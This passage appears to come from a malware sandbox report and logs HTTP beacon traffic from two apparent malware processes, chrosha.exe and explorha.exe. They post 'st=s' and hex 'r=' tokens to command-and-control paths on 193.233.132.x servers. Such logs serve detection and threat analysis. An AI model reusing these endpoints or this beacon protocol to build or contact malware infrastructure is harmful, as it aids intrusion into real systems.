                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:33:28.504972935 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:28 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
761 | 192.168.2.5 | 50609 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:28.491209030 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:33:28.739625931 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:28 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
762 | 192.168.2.5 | 50610 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:28.868971109 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:29.119822025 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:28 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
763 | 192.168.2.5 | 50611 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:29.099334955 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:29.341481924 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:29 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
764 | 192.168.2.5 | 50612 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:29.377603054 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:33:29.632725000 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:29 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
765 | 192.168.2.5 | 50613 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:29.594042063 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:33:29.848201036 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:29 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
766 | 192.168.2.5 | 50614 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:29.994434118 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:30.241482973 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:30 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
767 | 192.168.2.5 | 50615 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:30.203097105 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:30.443202019 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:30 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      768 | 192.168.2.5 | 50616 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:30.494560003 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:30.747695923 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:30 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      769 | 192.168.2.5 | 50617 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:30.689776897 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:30.938461065 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:30 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      770 | 192.168.2.5 | 50618 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:31.097949028 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:31.343008995 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:31 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      771 | 192.168.2.5 | 50619 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:31.309441090 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:31.560916901 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:31 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      772 | 192.168.2.5 | 50620 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:31.595381021 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:31.844468117 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:31 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      773 | 192.168.2.5 | 50621 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:31.813451052 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:33:32.066518068 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:31 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
774 | 192.168.2.5 | 50622 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:32.189155102 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:32.428426981 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:32 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
775 | 192.168.2.5 | 50623 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:32.425911903 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:32.667557001 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:32 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
776 | 192.168.2.5 | 50624 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:32.676234961 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:33:32.925983906 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:32 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
777 | 192.168.2.5 | 50625 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:32.912648916 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:33:33.159332037 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:33 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
